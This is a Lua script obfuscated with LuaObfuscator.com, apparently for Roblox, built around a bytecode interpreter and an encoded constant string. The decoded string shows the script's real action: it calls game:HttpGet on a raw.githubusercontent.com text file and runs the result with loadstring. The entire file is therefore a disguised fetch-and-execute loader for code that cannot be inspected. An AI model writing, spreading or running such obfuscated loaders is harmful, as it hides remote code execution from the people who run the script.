--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=0;local v84;while true do if ((0 -(0 + 0))==v83) then v84=(v31/(((882 -(282 + 595)) -3)^(v32-1)))%(2^(((v33-1) -(v32-(1 -0))) + (2 -(1638 -(1523 + 114))))) ;return v84-(v84%(620 -(555 + 64))) ;end end else local v85=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and ((834 + 94) -(214 + 713))) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (3 -(0 + 0)) );v19=v19 + (1069 -(68 + 997)) ;return (v37 * (16778486 -(226 + 1044))) + (v36 * ((63283 + 222087) -219834)) + (v35 * ((1330 -(892 + 65)) -((75 -43) + 85))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;while true do local v67=0;local v68;while true do if (v67==0) then v68=0;while true do if ((1131 -(87 + 1043))==v68) then if (v38==0) then local v103=0;while true do if (v103~=(450 -(10 + 438))) then else v38=1 + 0 ;break;end if (v103==(0 -0)) then v39={};v40={};v103=1 + 0 ;end if (v103==1) then v41={};v42={v39,v40,nil,v41};v103=2;end end end break;end if (v68==0) then local v99=0 + 0 ;while true do if (v99==0) then if (v38==(255 -(163 + 91))) then local v129=1930 -(1869 + 61) ;local v130;while true do if ((0 + 0)==v129) then v130=0 -0 ;while true do if (v130~=1) then else for v157=1,v43 do local v158=0 -0 ;local v159;local v160;local v161;local v162;while true do if (v158~=(1 + 0)) then else v161=nil;v162=nil;v158=2 -0 ;end if (v158==2) then while true do if (v159==(0 + 0)) then local v169=1474 -(1329 + 145) ;while true do if (v169~=(972 -(140 + 831))) then else v159=1851 -(1409 + 441) ;break;end if (v169~=0) then else v160=718 -(15 + 703) ;v161=nil;v169=1 + 0 ;end end end if (v159==1) then v162=nil;while true do if (v160~=(438 -(262 + 176))) then else local v171=1721 -(345 + 1376) ;while true do if (v171==(689 -(198 + 490))) then v160=4 -3 ;break;end if (v171==(0 -0)) then v161=v22();v162=nil;v171=1;end end end if (v160==(1207 -(696 + 510))) then if (v161==(1 -0)) then v162=v22()~=0 ;elseif (v161==(1264 -(1091 + 171))) then v162=v25();elseif (v161~=(1 + 2)) then else v162=v26();end v44[v157]=v162;break;end end break;end end break;end if ((0 -0)~=v158) then else v159=0;v160=nil;v158=3 -2 ;end end end v42[3]=v22();v130=2;end if ((374 -(123 + 251))==v130) then local v155=0;while true do if (v155==(4 -3)) then v130=1;break;end if (v155==0) then v43=v24();v44={};v155=1;end end end if (v130~=2) then else v38=2;break;end end break;end end end if (v38==(700 -(208 + 490))) then local v131=0;local v132;while true do if (v131==(0 + 0)) then v132=0 + 0 ;while true do if (v132==1) then return v42;end if (v132==0) then local v156=836 -(660 + 176) ;while true do if (v156==(0 + 0)) then for v163=203 -(14 + 188) ,v24() do local v164=0;local v165;local v166;while true do if (v164==1) then while true do if (v165==0) then v166=v22();if (v21(v166,676 -(534 + 141) ,1)==0) then local v173=0;local v174;local v175;local v176;local v177;while true do if (v173==1) then v176=nil;v177=nil;v173=1 + 1 ;end if ((0 + 0)~=v173) then else v174=0;v175=nil;v173=1 + 0 ;end if (v173~=(3 -1)) then else while true do if (v174~=(2 -0)) then else local v178=0;local v179;while true do if (0~=v178) then else v179=0;while true do if (v179==1) then v174=3;break;end if (v179==0) then local v186=0 -0 ;while true do if (v186~=1) then else v179=1 + 0 ;break;end if (v186==(0 + 0)) then if (v21(v176,1,397 -(115 + 281) )==(2 -1)) then v177[2 + 0 ]=v44[v177[4 -2 ]];end if (v21(v176,2,7 -5 )==1) then v177[870 -(550 + 317) ]=v44[v177[3]];end v186=1;end end end end break;end end end if (v174~=(1 -0)) then else local v180=0 -0 ;while true do if (v180==(0 -0)) then v177={v23(),v23(),nil,nil};if (v175==0) then local v185=0;while true do if (v185~=0) then else v177[3]=v23();v177[289 -(134 + 151) ]=v23();break;end end elseif (v175==(1666 -(970 + 695))) then v177[5 -2 ]=v24();elseif (v175==(1992 -(582 + 1408))) then v177[10 -7 ]=v24() -(2^(19 -3)) ;elseif (v175~=3) then else local v195=0 -0 ;local v196;while true do if (v195~=(1824 -(1195 + 629))) then else v196=0;while true do if ((0 -0)==v196) then v177[244 -(187 + 54) ]=v24() -((782 -(162 + 618))^(12 + 4)) ;v177[3 + 1 ]=v23();break;end end break;end end end v180=1 -0 ;end if (v180~=(1 -0)) then else v174=2;break;end end end if (0==v174) then local v181=0 + 0 ;while true do if (v181==(1637 -(1373 + 263))) then v174=1;break;end if (v181==(1000 -(451 + 549))) then v175=v21(v166,2,1 + 2 );v176=v21(v166,5 -1 ,6);v181=1;end end end if (v174==3) then if (v21(v176,3,4 -1 )==1) then v177[4]=v44[v177[1388 -(746 + 638) ]];end v39[v163]=v177;break;end end break;end end end break;end end break;end if (v164==0) then local v170=0 + 0 ;while true do if ((1 -0)==v170) then v164=1;break;end if (v170~=(341 -(218 + 123))) then else v165=1581 -(1535 + 46) ;v166=nil;v170=1;end end end end end for v167=1 + 0 ,v24() do v40[v167-1 ]=v29();end v156=1;end if (v156==1) then v132=1 + 0 ;break;end end end end break;end end end v99=561 -(306 + 254) ;end if (1~=v99) then else v68=1;break;end end end end break;end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v45=0;local v46;local v47;local v48;local v49;local v50;local v51;while true do if ((0 + 0 + 0)==v45) then v46=v24();v47=v24();v45=1 -0 ;end if ((1469 -(899 + 568))==v45) then v50=v21(v47,14 + 7 ,74 -(13 + 30) );v51=((v21(v47,635 -(268 + 335) )==((74 + 217) -(60 + 230))) and  -(573 -(426 + 146))) or (1 + 0) ;v45=1459 -(282 + 1174) ;end if (v45==3) then if (v50==0) then if (v49==(811 -(569 + 242))) then return v51 * (0 -0) ;else local v100=0;while true do if (v100==0) then v50=1 + 0 ;v48=1024 -(706 + 318) ;break;end end end elseif (v50==((3827 -(406 + 123)) -(721 + 530))) then return ((v49==0) and (v51 * (((3041 -(1749 + 20)) -(225 + 720 + 326))/(0 -0)))) or (v51 * NaN) ;end return v8(v51,v50-(911 + 112) ) * (v48 + (v49/(2^(752 -(271 + 429))))) ;end if (v45==(1 + 0)) then v48=1501 -(1408 + (1414 -(1249 + 73))) ;v49=(v21(v47,1087 -(461 + 625) ,1308 -(993 + 295) ) * ((1 + 1)^(1203 -(418 + 753)))) + v46 ;v45=1 + 1 ;end end end v26=nil;function v26(v52)local v53=0;local v54;local v55;while true do if (v53==(1 + (0 -0))) then v54=v3(v16,v19,(v19 + v52) -(1146 -(466 + 679)) );v19=v19 + v52 ;v53=4 -(116 -(4 + 110)) ;end if (v53==(5 -3)) then v55={};for v91=1, #v54 do v55[v91]=v2(v1(v3(v54,v91,v91)));end v53=1903 -(106 + 1794) ;end if (v53==(1 + 2)) then return v6(v55);end if (v53==0) then v54=nil;if  not v52 then v52=v24();if (v52==((584 -(57 + 527)) + 0)) then return "";end end v53=2 -1 ;end end end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=1427 -(41 + 1386) ;local v58;local v59;while true do if (v57==(103 -(17 + 86))) then v58,v59=v1(v16,v19,v19 + (2 -0) + 0 );v19=v19 + (3 -1) ;v57=2 -1 ;end if (v57==(167 -(122 + 44))) then return (v59 * 256) + v58 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v86=0;while true do if (v86==0) then v20=v0(v3(v60,1,1));return "";end end else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v60,16));if v20 then local v101=0;local v102;while true do if (v101==1) then return v102;end if (v101==0) then v102=v5(v88,v20);v20=nil;v101=1;end end else return v88;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v90=0;while true do if (v90==1) then if (v82<=3) then if (v82<=1) then if (v82>0) then do return;end elseif ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end elseif (v82>2) then local v104=0;local v105;local v106;while true do if (v104==1) then v79[v105 + 1 ]=v106;v79[v105]=v106[v81[4]];break;end if (v104==0) then v105=v81[2];v106=v79[v81[3]];v104=1;end end else v79[v81[2]]();end elseif (v82<=5) then if (v82==4) then local v107;local v108,v109;local v110;local v111;if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end v73=v73 + 1 ;v81=v69[v73];if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end v73=v73 + 1 ;v81=v69[v73];v111=v81[2];v110=v79[v81[3]];v79[v111 + 1 ]=v110;v79[v111]=v110[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v111=v81[2];v108,v109=v72(v79[v111](v13(v79,v111 + 1 ,v81[3])));v74=(v109 + v111) -1 ;v107=0;for v133=v111,v74 do v107=v107 + 1 ;v79[v133]=v108[v107];end v73=v73 + 1 ;v81=v69[v73];v111=v81[2];v79[v111]=v79[v111](v13(v79,v111 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];do return;end else local v120=v81[2];v79[v120]=v79[v120](v13(v79,v120 + 1 ,v74));end elseif (v82==6) then local v122=0;local v123;local v124;local v125;local v126;while true do if (v122==1) then v74=(v125 + v123) -1 ;v126=0;v122=2;end if (v122==2) then for v151=v123,v74 do v126=v126 + 1 ;v79[v151]=v124[v126];end break;end if (v122==0) then v123=v81[2];v124,v125=v72(v79[v123](v13(v79,v123 + 1 ,v81[3])));v122=1;end end else v79[v81[2]]=v81[3];end v73=v73 + 1 ;break;end if (v90==0) then v81=v69[v73];v82=v81[1];v90=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403403O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F66587A2O31342F66587A2O31342F6D61696E2F63616F6E696D612E74787400083O0012043O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);